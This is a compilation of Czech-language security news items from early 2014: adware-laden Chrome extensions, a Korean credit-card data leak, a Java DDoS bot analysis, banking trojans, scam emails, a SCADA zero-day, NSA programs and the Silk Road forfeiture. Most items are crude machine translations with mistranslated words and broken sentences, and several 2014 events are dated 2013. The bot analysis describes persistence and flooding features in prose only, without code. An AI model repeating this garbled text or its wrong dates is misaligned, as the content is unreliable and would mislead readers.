princezna (New) 23 ) azerty (New) 24) trustno1 (Down 12) 25) 000000 (New) Tento top 25 list byl sestaven ze souborů, které obsahují miliony ukradených hesel vyslaných on-line v průběhu předchozího roku. Společnost radí spotřebitelům nebo podnikům pomocí některé z hesel v seznamu je okamžitě změnit, a navrhuje, aby hesla bezpečnější s těmito tipy: Používejte hesla osm znaků nebo více smíšených typů postav. Ale i hesla se společnými substituce jako "dr4mat1c" mohou být ohroženy stále více sofistikované technologie útočníků, a náhodné kombinace jako "j% 7K & yPx $", může být obtížné pamatovat. Jeden způsob, jak vytvářet bezpečná hesla, která jsou snadno k odběru je na použití přístupových frází - krátká slova s mezerami nebo jinými znaky jejich separačních. To je nejlepší používat náhodná slova spíše než obyčejné fráze. Například, "koláče let narozeniny" nebo "smiles_light_skip?" Vyhněte se používání stejné kombinace uživatelského jména / hesla pro více webových stránek. Zvláště riskantní používá stejné heslo pro zábavu stránek, které děláte pro on-line e-mail, sociální sítě, nebo lokalit finančních služeb. Používejte různá hesla pro každou novou webovou stránku nebo službu se zaregistrovat. Máte potíže se zapamatováním všechny ty různé silných hesel? Zkuste pomocí hesla správce aplikace, která organizuje a chrání hesla a automaticky vás přihlásí do webové stránky.
Ad-tlačné koupit Chrome doplňky, aktualizovat je aplikovat reklamy
28.1.2013 Bezpečnost
Google má nový problém: původní add-on vývojáři jsou koupil z ad firem a jejich výtvory jsou vybaveny kód zobrazování reklam na nic netušící uživatele.
Praxe byla poprvé popsána Amit Agarwal, vývojář rozšíření "Přidat do Feedly" Chrome, který prodal svůj doplněk na osobě, která chtěla koupit pro 4-postava částky. "Neměl jsem tušení, o kupujícím a byl také zvědavý, proč by měl někdo platit tolik peněz za tak jednoduché rozšíření Chrome, "on psal , s tím, že převod vlastnictví hladce. ale to byl jen měsíc nebo tak později, že se objevil záměr kupujícího, jako uživatelé add-on začal stěžovat vidět spoustu reklam. Jak to dopadá, noví majitelé aktualizovali rozšíření přidáním ad-slouží kód k němu. A jak Google také aktualizuje Chrome add-ons automaticky, uživatelé dostali na novou verzi, aniž by o nic moudřejší. "Nejedná se o pravidelné bannerové reklamy, které vidíte na webových stránkách, jsou to neviditelné reklamy, které pracují na pozadí a nahradit odkazy na každé webové stránky, které navštívíte na affiliate odkazy. V jednoduché angličtině, pokud je aktivován rozšíření v Chrome, to bude aplikovat adware do všech webových stránek, "vysvětlil Argawal a dodal, že nyní lituje prodává rozšíření. Před měsícem, Ron Amadeo Také si všiml, že jeho Surfování na internetu se stala mnohem méně příjemný díky pop-up reklamy a unesli vyhledávání Google. Po trochu kopat kolem jeho ploše a notebooků, se vysledovat zdroj problému na příponu Chrome od názvu "Tweet této stránce", který zřejmě mlčky aktualizován k poskytování reklam jejími novými vlastníky. jako zpráva o tomto problému šíření, jeden z vývojářů populární rozšíření Chrome Honey sdílené na Reddit jeho a zkušenosti se svými kolegy "s malware společností, které se snažily koupit rozšíření, sběr dat společnosti, které se snažili koupit uživatelských dat, a adware společností, které se snažily partnerovi s nimi. Teď, když politika společnosti Google nebraňte prodlužovací vývojářům vložení reklamy na stránkách, které vyžadují, aby byli předem o tom, a nedělat to na více než jedné části stránky. Proto společnost reagovala na odhalení tím, že odstraní první dvě zmíněné doplňky z jejího internetového obchodu. Problém s praxí společnosti Google automaticky aktualizuje rozšíření Chrome je, že tento typ, co se může stát znovu a znovu. Uživatelé jsou žádáni, aby schválila aktualizaci pouze tehdy, pokud nová povolení se žádá. Je zřejmé, že stinné jedinci v pozadí těchto obchodů jsou opatrní koupit add-ons, které již mají oprávnění k "přístup ke svým datům na všech webových stránkách," což je jeden potřeboval volně aplikovat reklamy. Jedná se o osoby, jimž politiku společnosti Google na to, co add-on by neudělal znamená velmi málo, takže se obávám, že je to na Google najít řešení tohoto problému.
20M Jihokorejci ovlivněny zasvěcených krádeže dat
28.1.2013 Hacking | Kriminalita
Osobní a finanční údaje o asi 20 milionů Jihokorejců bylo ohroženo poradce pracující pro osobní ratingy firmy Korea Credit Bureau (KCB), AFP hlásí .
To je jeden z největších úniků dat v historii země, a byl zřejmě ovlivněn dvě pětiny veškerého obyvatelstva. zasvěcených v otázce měl přístup k interním serverům řady kreditních karet firem a ukradli uživatelských databází KB Kookmin karta, Lotte karty a NH Nonghyup karty. Informace ohrožena uživatele obsahuje jména zákazníků, telefonní čísla, čísla sociálního pojištění, čísla kreditních karet a datum vypršení platnosti. Zasvěcených prodával informace na telefonní marketingových společností. Po vyšetřování zjistili, co se stalo, zasvěcených a manažeři firem, kteří si koupili údaje byly okamžitě zatčen. Podle zprávy, budou postiženi uživatelé, hradí platební kartou společnosti v případě, že ztratí peníze kvůli kompromisu. Navzdory závažnosti porušení, Jihokorejci by neměla být šokován incidentu. V posledních dvou nebo třech letech, tam bylo docela málo podobné krádeže dat, a to buď provádí hackery nebo zasvěcenci. Jak se to stane, bývalý byly obvykle po osobní informace uživatelů, přičemž jen za poslední měsíc zaměstnanec Citibank Korea ukradl Informace o 34.000 klientů banky, včetně podrobností o jejich úvěrových smluv, a prodal ho do soukromých poskytovatelů úvěrů služeb. Nesouhlas ze strany Úřadu Nedostatečné zabezpečení také poznamenal, že cizinci s kreditními kartami z jihokorejských společností jsou potíže objevují, zda jejich informace byly v ohrožení dávce. Také, že manažeři v KB finanční skupiny a její jednotky KB Kookmin karty nabízejí, aby odstoupil v důsledku porušení.
Starbucks opravuje chybu s heslem v jeho aplikaci iOS
28.1.2013 Zranitelnosti | Mobil
Pokud jste postupovali minulý týden humbuk o aplikaci Starbucks iOS nalezeno ukládání hesel a umístění souřadnic ve formátu prostého textu, a máte obavy o vaše informace je ohrožena, aktualizovat aplikaci a nic víc starat. Starbucks řekl, že má pevnou problém v nová verze (2.6.2) z aplikace iOS a podle Daniela Wood, výzkumný pracovník, který původně objevil bezpečnostní chybu, problém je nyní vyřešen. aplikace není již ukládat hesla Starbucks účtu ve formátu prostého textu (heslo je nyní uloženy v Apple šifrované klíčenka), a zaznamenává pouze souřadnice posledního místa, kde má zákazník použitého jejich zařízení. "Jako takový, nevěřím, že tento obrázek je bezpečnostní problém, neboť není souhrnné údaje o zeměpisné poloze v průběhu času," řekl uvedeno v e-mailu zaslaného na mailing listu Full Disclosure. "Váš uloženy Geolocation je přepsán pokaždé a nemůže být použit ke sledování své pohybové vzory v průběhu času." Dodal také, že chyba nebyla tak vážná, jak média dělal to být. "Během počátečního testování aplikací, a to bez Šlo dat tam kreditní karty obsažené v tomto souboru, pouze vaše číslo Starbucks Card a množství váhy. V žádném okamžiku byly datové servery Starbucks v ohrožení, odhalení jejich 10 milionů zákazníků na aplikaci, jak se domnívají některé zprávy. Jednalo se o místní zneužít zranitelnost na Uživatelé zařízení, nikoli vzdáleně zneužít zranitelnosti na svých serverech, nebo jakýkoli jiný typ umožňující vzdálené spuštění kódu. " Jako vedlejší poznámku: Wood říká, že on byl "v nepřetržitém spojení s Starbucks", zatímco společnost pracuje na stanovení chybu . Podle Evan Schuman , Wood byl dočasně uloženy u společnosti jako bezpečnostní poradce (i když neplacená v současné době).
Reproduktory bojkotují RSA konference bude mluvit na TrustyCon
28.1.2013 Konference
Bezpečnostní poradenská firma ISEC Partners, Electronic Frontier Foundation (EFF) a DEF CON si oznámit, že budou zahajuje bezpečnostní technologie konferenci zbrusu-nový, TrustyCon .
Sponzorované společností Microsoft a CloudFlare a bude konat dne 27. února 2014 AMC Metreon v San Franciscu, bude akce "priority a zaměřit důvěru v technologie a technologických společností, v době, cynismu a pohrdání vůči bezpečnosti spotřebitele a ochrany soukromí." . Po úvodní slovo z ISEC Partners spoluzakladatel Alex Stamos, plný program panelů bezpečnostních expertů a hlavní řečník bude řešit budoucnost důvěry v technologie Potvrzeno reproduktory a panelisté jsou:
Alex Stamos, Chief Technology Officer, Artemis
Jeff Moss, zakladatel, DEF CON a Black Hat
Marcia Hofmann, Ochrana prokurátor
Mikko Hypponen, vedoucí výzkumný pracovník, F-Secure
Chris Palmer, Software Security Engineer, Google
Christopher Soghoian, hlavní technolog, Američan odbor občanských svobod
Je-li tato jména povědomá, je to proto, že některé z těchto reproduktorů byly naplánovány mluvit na konferenci RSA 2014, ale vytáhl své jednání v návaznosti na veřejné obvinění , že RSA přijato 10 milionů dolarů z NSA, aby backdoored Dual EC_DRBG výchozí algoritmus ve svém Bsafe řešení. "zveřejnění tohoto obchodu má vliv na důvěryhodnosti jednotlivce a společnosti místo ve vládních a technologických společností a udeřil na správnou strunu mezi podniky a spotřebiteli. To vzbuzuje obavy, pokud jde o způsoby průmysl může profitovat ze vztahů s vládou a zda mezinárodní klienti mohou důvěřovat jejich poskytovatele zabezpečení, "poznamenal organizátoři konference. "TrustyCon slouží jako výzvu k akci, ke společnostem navrhnout jejich technologie a podniky, aby byl bezpečný a důvěryhodný." Konference jedna skladba se bude konat v místě s omezeným prostorem, tak pouze 400 vstupenek bude k dispozici pro ty, kteří zájem o účast. Cena jízdenky je $ 50, a celý výtěžek bude věnován na ERF.
Neoficiální průvodce pro Tor: Opravdu soukromé prohlížení
28.1.2013 Zabezpečení | Ochrana
Problematika ochrany soukromí na Internetu již dlouho obtížný: existuje spousta dobrých důvodů, proč byste mohli být podezíravý k cizím lidem, čtení e-mailů nebo špionáž na webových stránkách, které navštívíte.
Tam jsou stejně přesvědčivé důvody, že různé bezohlední lidé, korporace a vlády chtít udělat právě to. Celá problematika se dostala do hlavy v poslední době s odhalením, že NSA byl nezákonně špehovat americké občany a ostatními přes Facebook, Google a Skype -. Včetně, pravděpodobně budete Stručně řečeno, Tor je mocný, bezstarostný-až k -použití kus software, který vám umožní udržet vaše online soukromí život. Tato příručka vám poskytne návod krok za krokem k instalaci, konfiguraci a použití Tor, a jak jste začali brát aktivní roli při ochraně vašeho soukromí na internetu.
Cross-platform java-bot
28.1.2013 BotNet | Viry | Kriminalita
Na začátku tohoto roku jsme obdrželi škodlivý Java aplikace pro analýzu, což se ukázalo být multi-platforma bot schopný běžet na Windows, Mac OS a Linux. Bot byl psaný úplně v Javě. Útočníci používají zranitelnosti CVE-2013-2465 infikovat uživatelům s malware.
Inicializace a dešifrování řetězce
Chcete-li analýzu a detekci malware těžší, jeho vývojáři použili Zelix Klassmaster Obfuscator. Kromě toho plést bytecode, Zelix šifruje řetězcové konstanty. Zelix vygeneruje jiný klíč pro každou třídu - což znamená, že aby bylo možné dešifrovat všechny řetězce v aplikaci, budete muset analyzovat všechny třídy, aby bylo možné nalézt dešifrovací klíče.
Inicializační řetězec a dešifrování se provádí ve statickém Inicializátor kódu (<clinit>).
Šifrované inicializační řetězec
Algoritmus je následující: mít aktuální index zašifrované znaku v řetězci, spočítat zbytek z jeho dělení 5 a vyberte aktuální klíč v závislosti na výsledku. Dále identifikovat dešifrovat charakter provedením modul 2 bitový doplněk k vybranému tlačítku.
String dešifrování
Pro konkrétní případ, dešifrování algoritmu vypadá takto:
Provádění Python z dešifrování algoritmu
Zahájení
Po spuštění bota kopíruje do domovského adresáře uživatele a sám se nastaví spuštění při startu systému. V závislosti na platformě, na které bylo zahájeno bot, tato metoda se používá pro přidání do autostart programů:
Pro Windows - HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run
Mac OS - standardní služba launchd Mac OS se používá
Pro Linux - / etc / init.d /
Tělo bot obsahuje zašifrovaný konfigurační soubor pro launchd služby.
Dešifrovat konfigurační soubor pro launchd služby
Po spuštění a nastavení se spouštět při startu systému, bot musí tuto skutečnost oznámit svým majitelům. Chcete-li poskytnout prostředek identifikace každého bot, jedinečný identifikátor bot je generován na každém počítači uživatele. Identifikátor se uloží do souboru jsuid.dat v domovském adresáři uživatele.
Obsah jsuid.dat
Ovládání bot
Bot je ovládán pomocí protokolu IRC. To nás vede k ještě jeden zvědavý rys tohoto malware - používá PircBot otevřený rámec k naplňování komunikaci přes IRC. Malware zahrnuje všechny třídy potřebné pro tento účel.
Po spuštění malware iniciuje připojení k IRC serveru.
Připojení k IRC serveru
Po úspěšném navázání spojení, bot připojí předdefinovaný kanál a čeká na příkazy útočníků:
Připojení IRC kanál
Hlavní funkce
Bot je navržen tak, aby provedla DDoS útoky z infikovaných uživatelů počítačů.
Bot podporuje dva typy povodní:
HTTP
UDP
Který typ útoku je třeba použít je určen útočník v IRC kanál pro zombie strojů. Kromě toho, že tyto parametry jsou uvedeny:
Adresa počítače, které mají být napaden
Číslo portu
Doba trvání útoku
Počet vláken, které mají být použity v útoku
Generování hlavičky během povodní HTTP útok
Hodnota User-Agent, které mají být vloženy do HTTP požadavku je vybrán náhodně ze seznamu uloženého v těle bota v šifrované podobě.
Dešifrovat seznam hodnot uživatelského agenta podporovaných bot
Při analýze malware, jsme zjistili pokus napadnout hromadné e-mailové služby.
Příkaz k útoku
Kaspersky Lab detekuje malware jako HEUR: Backdoor.Java.Agent.a .
Rádi bychom poděkovali Zoltan Balazs, CTO v MRG Effitas, pro sdílení vzorek malware s námi.
Může vaše chladnička posílat spam?
28.1.2014 Spam
Poslední dobou se začínají objevovat zprávy, že kyberzločinci si vytvářejí síť spambotů z chytrých zařízení v domácnostech. Může tedy chytrá chladnička nebo televizor posílat bez vašeho vědomí nevyžádanou poštu?
Termín Internet věcí se snaží zachytit architekturu, kterou bude velké a pestré množství domácích či průmyslových přístrojů připojených do Internetu, ať už pro přenos dat nebo vzdálenou správu. Samozřejmě to znamená větší inteligenci jednotlivých zařízení, která s sebou přináší stejná rizika jako plnohodnotné počítače, ať už jde o možnost průniku či zavirování.
Někteří odborníci tvrdí, že jsme se už dostali do fáze, kdy některé ledničky či kávovary vybavené připojením k internetu rozesílají pod vlivem malwaru spam. Konkrétně bezpečnostní firma Proofpoint uveřejnila zprávu, podle které před týdnem zaznamenala útok pravděpodobně pocházející od chytrých zařízení. Popisuje globální útok sestávající z více než 750 000 emailů pocházejících z více než 100 000 jednotek domácích zařízení, jako jsou multimediální centra, televizory a minimálně jedna lednička.
Firma Symantec ale zmiňované údaje rozporuje. Podle Liama O’Murchua, manažera týmu bezpečnostních operací: „Symantec nikdy nic takového nezaznamenal. Internet velmi pečlivě monitorujeme a věříme, že něčeho takového bychom si všimli. Za takovými výsledky musí být chyba nějaké analytiky firmy Proofpoint.“
Moderní lednička skutečně může mít IP adresu, kterou potřebuje pro vzdálené monitorování, jako je teplota či funkčnost kompresorů, ale nikoli rutiny vhodné pro odesílání spamu. Symantec spíše sází na to, že na vině byly domácí počítače maskované za domácím směrovačem provádějícím překlad adres a směřování portů. Těžko ovšem uvěřit, že by takový triviální scénář firma jako Proofpoint přehlédla či neověřila.
Ta ostatně nadále trvá na své analýze: „Kyberzločinecké skupiny již začaly ovládat domácí směrovače, chytrá zařízení a další komponenty Internetu věcí a měnit je na zombie či thingboty. Jsme velmi dobře obeznámeni s technologií přesměrovávání portů, kterou naši kritikové zmiňují. Ověřovali jsme, že emailové zprávy nepocházely z překládaného segmentu, ale přímo z rozhraní WAN.“
Experti Symantecu zůstávají pesimističtí, ale současně připouštějí, že se již setkali se dvěma červy, které napadají zařízení spadající do internetu věcí, jako jsou kamery a mediální centra. Zajímavý je především červ označovaný jako Linux.Darlioz, který během infikování ověřuje, zda se na zařízení nachází konkureční červ Linux.Aidra a případně jej odstraňuje.
Nikdo ovšem nepochybuje, že bezpečnostní otázky okolo chytrých zařízení jsou povětšinou ignorovány a velké problémy nás teprve čekají. A dříve nebo později zřejmě představa ledničky rozesílající spam už nebude tak úsměvná.
Nebezpečný virus cílí na bankovní účty v Česku
27.1.2014 Viry | Phishing
V posledních dnech ve vodách českého internetu pluje nebezpečný virus, pomocí kterého se snaží počítačoví piráti vysát lidem peníze z účtu. Obejít dokonce dokážou i verifikaci prostřednictvím mobilního telefonu, kterou banka ověřuje, zda se má transakce opravdu uskutečnit. Před nezvaným návštěvníkem varovala Česká spořitelna.
V podvrženém internetovém bankovnictví podvodníci uživatele vyzvou k instalaci programu, který je podle nich nutný ke správě účtu on-line
Ve chvíli, kdy se kyberzločincům podaří trojského koně propašovat do cizího počítače, zaměří se také na uživatelův chytrý telefon, aby získali přístup k autorizačním SMS zprávám. Vzhledem k tomu, že většina uživatelů zabezpečení svých mobilních přístrojů podceňuje, je hrozba o to větší.
Do smartphonu se útočníci zpravidla dostanou jednoduchým trikem. V podvrženém internetovém bankovnictví uživatele vyzvou k instalaci programu, který je podle nich nutný ke správě účtu on-line. Pokud tak uživatel učiní, nic již kyberzločincům nebrání k vysátí peněz z účtu.
Podvodná zpráva připomínající službu Servis 24 České spořitelny.
„Nikdy neinstalujte do svých mobilních telefonů aplikace z neznámých zdrojů. Pokud se vám při práci v internetovém bankovnictví objeví na monitoru neznámé okno a bude vás vybízet k instalaci bezpečnostní aplikace, nikdy na to nereagujte,“ varovali zástupci České spořitelny.
„V případě, že byste zaznamenali nezvyklé chování ve vašem internetovém bankovnictví, např. zmíněné nabízení instalace bezpečnostní aplikace do mobilního zařízení, tak neprodleně kontaktujte bezplatnou informační linku České spořitelny 800 207 207,“ vyzvali zástupci banky v souvislosti se službou Servis 24. Ohrožení by se ale mohlo týkat i dalších bank.
Obdoba tohoto viru se objevila už v polovině loňského roku. Tehdy před touto formou hackerských útoků varovala Česká bankovní asociace (ČBA) s tím, že hrozba se týká více bankovních institucí. Stejný druh podvodů byl zachycen také v zahraničí.
Červ útok! Vaše schránka je v ohrožení
27.1.2014 Viry
V naší praxi se často setkáváme s případy, kdy jsou zprávy s nebezpečným přílohu hmotnost-mailem na mnoho adres současně. V poslední době, když jsme viděli řadu zpráv odeslaných trvale na stejnou e-mailovou adresu. Zdá se, že hlavním cílem útočníka bylo infikovat, že počítač - všechny e-maily, bez ohledu na to, co jejich hlavičky byly obsaženy Email-Worm.Win32.NetSky.q. Charakteristickým rysem tohoto červa je, že se šíří prostřednictvím e-mailových příloh. Po infikování počítače, červ najde všechny e-mailové adresy v něm a kopie sám na ně, s využitím specifických krátké fráze a vyhnout se jakékoliv e-mailové adresy, které mohou být přímo spojeny s poskytovateli IT zabezpečení, jako jsou antivirové společnosti.
První zpráva, kterou zjištěna údajně přišli z platebního systému PayPal. Text v těle dopisu řekl, že byl účet pro uživatele v příloze.
Nicméně, uživatelé výstrahy může připomenout, že PayPal typicky obsahuje fakturační údaje v textu, a nikoli v přiloženém souboru.
Další e-mail přišel ve jménu USA Hosting správy. Lákat uživatele k otevření přílohy, útočníci říkají, že uživatel "mailový účet vypršel", a naznačují, že ho uživatel aktivuje se "detaily" v příloze.
Třetí email údajně přišel z dodavatele antivirového softwaru Symantec. Zpráva říká, že počítač uživatele byl napaden novým virem. Chcete-li jej odstranit, musí uživatel stáhnout přiložené antivirové podpisy. Opět platí, že výstraha uživatel může být podezřelý z toho, že podpis byl od konkurenční antivirové společnosti BitDefender.
Všechny tyto dopisy přišel během téhož měsíce, a ačkoli oni měli různé předměty, které mají stejné cíle infikování počítače uživatele a šíření malwaru v síti. Proto bychom chtěli upozornit uživatele, že extra opatrnost je potřebná při jednání s jakýmkoliv e-mail, který přijde s přílohami. Je důležité si uvědomit, že každý úřední dopis by měl mít vhodnou konstrukci - a autentické loga a podpisy. Pokud jsou uživatelé jisti identitou odesílatele, stojí za to kontaktovat linku technické podpory firmy pro potvrzení. Použití rozumné opatření pro příchozí poštu, v kombinaci se spolehlivým bezpečnostním produktu, pomáhá udržovat váš počítač v bezpečí před nebezpečím z kyberprostoru.
Mandela miliony
27.1.2014 Spam
V prosinci jsme registrováno "nigerijské" korespondenci využívající téma Nelsona Mandely smrti oklamat uživatele. Stejné téma je stále inspirující spam maily v lednu - ale tentokrát tam jsou některé rozdíly v obsahu - intro a autorův podpis. Na první pohled se zdálo, že mezi e-maily nic společného.
Například, první e-mail byl napsán jménem Mandely vnučka, zatímco autor druhé zprávě tvrdil, že předseda jedné z prostředků Mandela. Tyto názvy byly identifikovány v oblasti "Z", a v podpisu na konci zprávy. Má vnučka od prvního e-mailu psal o fond, jehož předsedou se ukáže být autorem druhého e-mailu. Zbývající text obou zpráv je totožný se do posledního písmene.
"Nigerijské" podvodníci používají své tradiční trik informovat uživatele, že před svou smrtí Nelson Mandela dal instrukce k distribuci 20.000.000 dolarů z fondu na náhodně vybraných lidí po celém světě, a samozřejmě příjemce e-mailu byl mezi deset šťastných lidí . Pro více informací o tomto výhru, oběť měla kontaktovat autora e-mailu. Ve zprávě "vnučka" kontaktní adresa je odlišná od adresy odesílatele, "předseda" navrhl žádné alternativní kontakty. Dalším specifickým rysem hromadnou korespondenci byl "pokus spojit své" podvodníky Nigeria letters'to posledních svátky: Vánoce a Nový rok byly uvedeny jak v předmětu, a na konci e-mailu.
Nigerijský polygloti
27.1.2014 Spam
Zprávy z bankovních pracovníků nebo milionářů, kteří hledají někoho, kdo by jim pomohl v hotovosti v obrovské sumy peněz, již nejsou schopny nás překvapují. Většina z těchto e-mailů jsou psány v angličtině, která byla dlouho jazykem mezinárodní korespondence - to bylo neobvyklé, aby někdy vidět tyto druhy zpráv napsaných v jiných jazycích. Nicméně, co se změnilo, a nyní jsme stále svědky dopisy, jako je to napsané v portugalském, francouzském, španělském a ruském jazyce, stejně jako v hebrejštině, Běloruska a arabštině.
Zde je dopis o vítězství v "australské loterie", která se konala na několika kontinentech. Je napsán v arabštině a používá standardní podvod: příjemce je říkal, že on / ona byla náhodně vybrána z milionů lidí a získal velkou sumu peněz. Aby bylo možné žádat o peníze, uživatel musí obrátit na podvodníky.
V dalším dopise, který napsal v hebrejštině, bankovní úředník nabízí ke sdílení multi-milión štěstí, že patřil ke klientovi banky, který zemřel při nehodě.
Následující dopis je napsán v běloruštiny a znovu vypráví o milionáře, který zemřel. Banka hledá pro své příbuzné, aby mohli předávat dědictví.
Podvodníci často používají elektronické překladatelské nástroje překládat své zprávy do jiných jazyků. Výsledkem je, že jejich zprávy mohou být zkreslené během překladu. Také podvodníci nevěnují pozornost regionálním charakteristikám potenciálního příjemce - používat stejné příběhy o milionáři umírajících bez zanechání dědice, a pouze překládat texty do příslušného jazyka. Pokud obdržíte zprávu, jako je tento ve svém rodném jazyce a najít některé věci, o tom zvláštní, je to lepší jen smát snaze být polygloti, a ignorovat všechny své sliby o bohatství. Po tom všem, bez ohledu na částek uvedených nebo použitého jazyka, tyto podvody zůstávají jen, že - podvody.
Výzkumník ukazuje SCADA zero-day, akcie PoC
27.1.2014 Zranitelnosti
Italský vědec dobře známý pro jeho zkoumání průmyslových řídicích systémů (ICS) prokázal vykořisťování a zero-day chybu, která může způsobit pád nebo vést ke kompromisu Web-based SCADA software, který se používá v téměř 40 zemích po celém světě . Luigi Auriemma, který je také spoluzakladatel a generální ředitel společnosti Malta na bázi start-up ReVuln, že sdílí informace zranitelnost se svými platících zákazníků, představila útok na účastníky z SCADA Security vědecké sympozium konalo tento týden v Miami na Floridě. zranitelný software v otázce je IntegraXor, dispečerské řízení a sběr dat / human-machine interface (SCADA / HMI) produkt vyvinutý Malajsie založené výrobce Ecava. Chyba je přetečení bufferu chyba, která může být využita na dálku provádět servisní útok DoS OD, jsou-li splněny určité podmínky, nebo dokonce ke spuštění škodlivého kódu v systému. Toto zveřejnění zranitelnosti vedla ICS-CERT vydávat upozornění ve čtvrtek a naléhat na prodejce o potvrzení této chyby zabezpečení a určit snižující závažnost rizika co nejdříve. Společnost reagovala téměř okamžitě, a v pátek se potvrdilo , že se oprava na oznámenou chybu zabezpečení a vydala opravu, která je součástí nejnovější verze softwaru. "Jeden z předpokladu této zranitelnosti je mít úplnou cestu k projektu adresy URL. Takže prosím, vyhnout se sdílet nebo publikovat nasazen projektu adresu. A také zabránit používat číslo portu systému výchozí," Vývojáři vyzval uživatele, s tím, že by to mohlo být dobrý moment pro aktualizaci softwaru, jako vada nebude pevně ve starších staví.
NSA sbírá 200 milionů textových zpráv denně
27.1.2014 Špionáž
Jak svět čeká amerického prezidenta Obamy oficiální oznámení jeho plány na reformu NSA, The Guardian uvedeny podrobnosti o dalším NSA hromadné programu sběru dat je popsán v memorandu z UK Government Communications Headquarters (GCHQ) a NSA prezentaci. Jméno tenhle je je "Dishfire", program zaměřený na sběr SMS zpráv po celém světě, aby bylo možné extrahovat z nich umístění, vyplacení, kontakt, cestovní údaje a další, objevovat činnosti současných, ale i budoucích cílů. kolekce je sám o sobě necílené, ale shromážděná data je samozřejmě jsou uložena pro pozdější analýzu. "Na rozdíl od většiny] [GCHQ ekvivalentů, Dishfire obsahuje velké množství nevybranou SMS provoz. Tím je zvláště užitečné pro vývoj nových cílů, protože je možné, zkoumat obsah zpráv odeslaných měsíce nebo dokonce roky, než byl cíl známo, že je předmětem zájmu, "je popsán v GCHQ zprávě z roku 2011. Prezentace NSA ukazuje, že v dubnu 2011, program shromážděné 194000000 textových zpráv denně v průměru, a že uložené zprávy mohly být vyhledávány a analyzovány pomocí jiného programu daboval "raději". Dvě věci jsou zajímavé poznamenat: jeden, že zprávy odeslané z a telefonní čísla v USA jsou odebrány z databáze, jakmile je to možné, aby NSA se může zaměřit na "platných zahraničních zpravodajských cílů", a dva, že Spojené království GCHQ je možné používat program, ale její analytici jsou zakázány podle britského práva z koukat do obsahu zpráv odeslaných do az telefonních čísel ve Spojeném království, pokud mají vyžadují, aby tak učinily. "Dishfire je systém, který zpracovává a ukládá legálně získané SMS údaje. Protože některé SMS údaje o amerických osob mohou být někdy náhodně shromážděné v NSA zákonného zahraniční zpravodajské poslání, ochrany soukromí, na amerických osob existují v rámci celého procesu týkajícího se používání, manipulace, uchovávání a šíření SMS údajů v Dishfire, "mluvčí NSA komentoval pro The Guardian. "Kromě toho, NSA aktivně pracuje na odstranění nadbytečné údaje, aby zahrnoval nevinných zahraničních občanů, co nejdříve v tomto procesu." Další věc, dobré zmínit, je, že všechny informace o programu byl pravděpodobně pravda, v roce 2011, ale věci od té doby mohla změnit.
Bruce Schneier kalhotky americký kongres na NSA
27.1.2014 Špionáž
Dobře známý cryptographer a bezpečnost počítačový expert Bruce Schneier byl povolán, aby informovali šest členů amerického Kongresu. The skupina, skládající se ze zástupců Zoe Löfgren, Jim Sensenbrenner, Bobby Scott, Bob Goodlatte, Mike Thompson, a Justin Amash, se setkal s Schneier . bez přítomnosti členů organizace nebo členů veřejnosti "mě požádal, abych Lofgren ji informovat a několik zástupců na NSA Řekla, že NSA nepřišlo o své činnosti, a oni mě chtěli -. jako někdo s přístupem k dokumenty Snowden - vysvětlit jim, co NSA dělá, "Schneier sdílené . čtvrtek Kromě toho, že znalec kryptografie Schneier je také hlasitý soukromí obhájce. On je jeden z mála lidí, kteří měli přístup k dokumentům, které NSA informátor Edward Snowden exfiltrated ze sítě agentury. On byl stále sdílet objevy o dokumentovaných činností NSA dozoru a schopností se světem i na svém blogu a zpravodajské stránky Guardian , a také psal články o tom řada běžných a bezpečnostních publikací. "Samozřejmě, že nebudu uvádět podrobnosti o jednání, kromě toho, že to byl upřímný a zajímavý. A že je to velmi podivné, že Kongres má takové těžké době získávání informací z NSA, které mají a zeptejte se mě, "poznamenal. "Opravdu chci dohled lépe pracovat v této zemi." Jak podotkl, to všechno jsou zástupci, které "chtějí udržet na uzdě NSA". Sensenbrenner představil zákon svobodu USA ( souhrn ) na americké Sněmovny reprezentantů. Zákon byl jejímiž spolupořadateli - mimo jiné -. Lofgren, Scott a Amash Amash se také pokusil (a neúspěšný) změnit ministerstvo obrany Položky zákona roku 2014 a jejichž cílem je omezit finanční prostředky pro NSA shromažďování údajů v odvětví elektronických komunikací v případech, kdy subjekt není předmětem konkrétního zkoumání. Nicméně, je dobré vidět, že někteří členové amerického Kongresu se snaží získat vyvážený přehled o aktivitách nestátních subjektů, a to zejména, když se americký prezident Obama neočekává, že vládnout v NSA, stejně jako mnozí by přání.
Silk Road ztrácí 28000000 dolar v Bitcoins
27.1.2014 Kriminalita
Preet Bharara, Spojené státy zmocněnec pro jižní obvod New Yorku, oznámil propadnutí cca 29.655 Bitcoins (což v dnešní Bitcoin směnného kurzu, které stojí přibližně 28 milionů dolarů), které byly zabaveny ze serveru Silk Road, stejně jako propadnutí skryté webových stránek Silk Road. Silk Road skrytý webových stránek a Bitcoins, které byly propadlé včera byly zabaveny v souvislosti s akcí občanské propadnutí dříve podané na Manhattanu federálního soudu dne 30. září 2013 usiluje o propadnutí veškerého majetku z hedvábí Road, včetně jeho webové stránky a všechny jeho Bitcoins, protože tato aktiva údajně byly použity usnadnit praní špinavých peněz a představují vlastnictví zapojených do praní špinavých peněz. Kromě občanskoprávní žaloby, trestní oznámení proti Ross William Ulbricht, a / k / a "Dread Pirate Roberts, "/ k /" DPR, "/ k /" Silk Road ", údajný vlastník a provozovatel skryté webových stránek Silk Road, byla podána v září 2013 v Manhattan federálního soudu mu nabíjení s jedním počtu . narkotika spiknutí, jeden z počtu spiknutí k páchání počítačové hacking, a jednoho počtu praní špinavých peněz, spiknutí propadnutí objednávka byla podepsána Spojené státy okresní soudce J. Paul Oetken. Manhattan americký právník Preet Bharara řekl: "S dnešním propadnutí 28.000.000 dolarů hodnotě Bitcoins z webové stránky Silk Road, globální kybernetické obchodní navržen tak, aby zprostředkovaly trestní transakce, budeme pokračovat v našem úsilí, aby zisk z trestné činnosti a signál těm, kdo by se obrátit na temnou webu za nedovolenou činnost, že jste zvolili nesprávné cesta. Tyto Bitcoins se propadá ne proto, že jsou Bitcoins, ale proto, že byli, jak soud shledal, že výnosy z trestné činnosti. " skrytý web Silk Road byl navržen tak, aby svým uživatelům nakupovat a prodávat nelegální drogy a jiné nezákonné zboží a služby anonymně a mimo dosah činných v trestním řízení. V souvislosti s činnosti občanské propadnutí věci, a kromě Bitcoins, které byly propadlé včera vláda chytil an additional 144336 Bitcoins (což v dnešní Bitcoin směnného kurzu, které stojí více než 130 milionů dolarů), které byly nalezeny na počítačový hardware, které patří do Ulbricht . Ulbricht podal žalobu v akci občanské 